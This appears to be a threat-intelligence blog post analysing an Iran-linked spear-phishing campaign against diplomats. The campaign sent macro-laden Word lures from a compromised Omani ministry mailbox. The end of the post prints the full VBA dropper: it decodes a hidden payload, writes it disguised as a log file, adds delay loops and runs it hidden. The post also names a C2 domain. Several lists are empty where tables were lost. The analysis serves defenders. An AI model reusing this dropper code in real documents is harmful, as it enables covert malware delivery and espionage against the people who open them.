In August 2025, as part of Dream’s threat intelligence agents’ ongoing monitoring of cyber activity, a spear-phishing campaign was identified leveraging a compromised mailbox of the Ministry of Foreign Affairs of Oman based on a tweet [https://x.com/ClearskySec/status/1960296933295104369].
Based on a forensic investigation, we attribute this campaign to Iranian-aligned operators connected to broader offensive cyber activity led by the Homeland Justice group associated with MOIS (Ministry of Intelligence and Security of Iran).
Emails were sent to multiple government recipients worldwide, disguising legitimate diplomatic communication. The emails contained a malicious Microsoft Word attachment with a disguised registration form. The document embedded encoded content as numerical sequences, which were decoded using embedded VBA macro code. When executed, the macro converted each sequence of three numbers into ASCII characters, reconstructing and deploying the malware payload.
Taken together, the Oman spear-phishing operation shows a continuity of tactics, techniques, and procedures (TTPs) from earlier campaigns. Evidence points toward a broader regional espionage effort aimed at diplomatic and governmental entities during a time of heightened geopolitical tension.
Figure 1: The Iran-Nexus Spear phishing Campaign attack path.
Analysis of the Homeland Justice campaign reveals it was multi-wave and operated on a larger scale than initially apparent. From a dataset of 270 emails, 104 unique compromised addresses were leveraged to mask the true origin of the activity. This breadth indicates the campaign extended well beyond a single country and was part of a coordinated regional effort.
The infrastructure and malware were also deployed against specific national institutions during a period when that country was engaged in sensitive ceasefire negotiations with Hamas in 2025, underscoring the geopolitical intent of the operation.
Recipients included embassies, consulates, and international organizations across multiple regions. The lure content consistently referenced urgent MFA communications, conveyed authority, and exploited the common practice of enabling macros to access content, which are the hallmarks of a well-planned espionage operation that deliberately masked attribution
The attack originated from a social engineering campaign targeting the Omani Embassy in Paris. In this campaign, attackers sent an email containing a Word document embedded with malware.
The following are email samples that were obtained during the investigation. Some included the following syntax: “The Future of the region after the Iran-Israel war and the role of Arab countries in the Middle East”.
Figure 2: One of the phishing emails used during the campaign.
The Email data and indicators are as follows:
The malicious documents contained Visual Basic for Applications (VBA) macros hidden in the project’s “This Document” and “UserForm1” modules. The key functions were:
The macro decodes a hidden payload from a user form, writes it to a file disguised as a log, and executes it without user interaction. The use of laylay to introduce delays and the vbHide parameter to hide execution, along with writing to a file in the public documents folder, are classic evasion techniques. The overall chain reflects a typical macro dropper: decode embedded payload → write to disk → execute hidden.
Figure 3: The campaign VBA Macro Execution Chain.
{
"userName": "",
"computerName": "",
"ID": "",
"isAdmin": "
Outbound Traffic: The malware attempts TLS connections to screenai.online on port 443. When executed in a sandbox, the connection attempts returned GetLastError 0x2ee7 (host unreachable), indicating the C2 server was unavailable or blocked at the time.
The components and their utilization by the campaign during the attack are as follows:
The use of a legitimate MFA mailbox increased trust, while routing through VPN nodes obscured the attacker’s origin.
The campaign targeted multiple regions with varying numbers of recipients and email volumes. The listing below interprets the first number as the count of targeted countries and the second as the count of recipient email addresses; example recipients are shown for context.
The regional targeting summary is as follows:
The figures suggest deliberate regional target tailoring with:
This campaign exhibits characteristics of a well-planned espionage operation:
The attackers were likely seeking to gain initial access, map internal networks, and prepare for further exploitation in diplomatic and industrial organizations.
By implementing these measures, organizations can more effectively identify and reduce similar phishing and dropper campaigns.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dddd(str As String) As String
Dim out As String
For counter = 1 To Len(str) Step 3
out = out & Chr((Val(Mid(str, counter, 3))))
Next
dddd = out
End Function
Function laylay()
Dim loop1 As Integer
Dim aa As Integer
loop1 = 105
For tmp1 = 1 To loop1
For tmp2 = 1 To loop1
For tmp3 = 1 To loop1
For tmp4 = 1 To loop1
aa = aa + 1
Next
aa = 0
Next
Next
Next
aa = 0
End Function
Function RRRR(path As String)
On Error GoTo erorr2
Dim executablePath As String
Dim command As String
Dim windowStyle As Integer
Dim waitOnReturn As Boolean
Dim errorCode As Variant
laylay
executablePath = path
command = executablePath
windowStyle = vbHide
waitOnReturn = False
laylay
errorCode = Shell(command, windowStyle)
If errorCode <> 0 Then
End If
erorr2:
'n
End Function
Private Sub Document_Open()
On Error GoTo AAAA
Dim pth As String
Dim malmal_path As String
pth = "C:\\Users\\Public\\Documents\\ManagerProc.log"
laylay
Dim app As String
app = dddd(UserForm1.TextBox1.Text)
laylay
'''''''''''''''''''''''
fileNumber = FreeFile
Open pth For Output As fileNumber
Print #fileNumber, app
Close fileNumber
RRRR (pth)
laylay
AAAA:
' n
End Sub
Macro #2: UserForm1
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{B07E7806-EEFB-49E6-9E29-A01BFB859EB1}{33C0C9D3-594C-4052-AE14-ED0675F0DB23}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()
End Sub
By clicking Subscribe, I agree to the use of my personal data in accordance with Dream security Privacy Policy. Dream security will not sell, trade, lease, or rent your personal data to third parties. This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.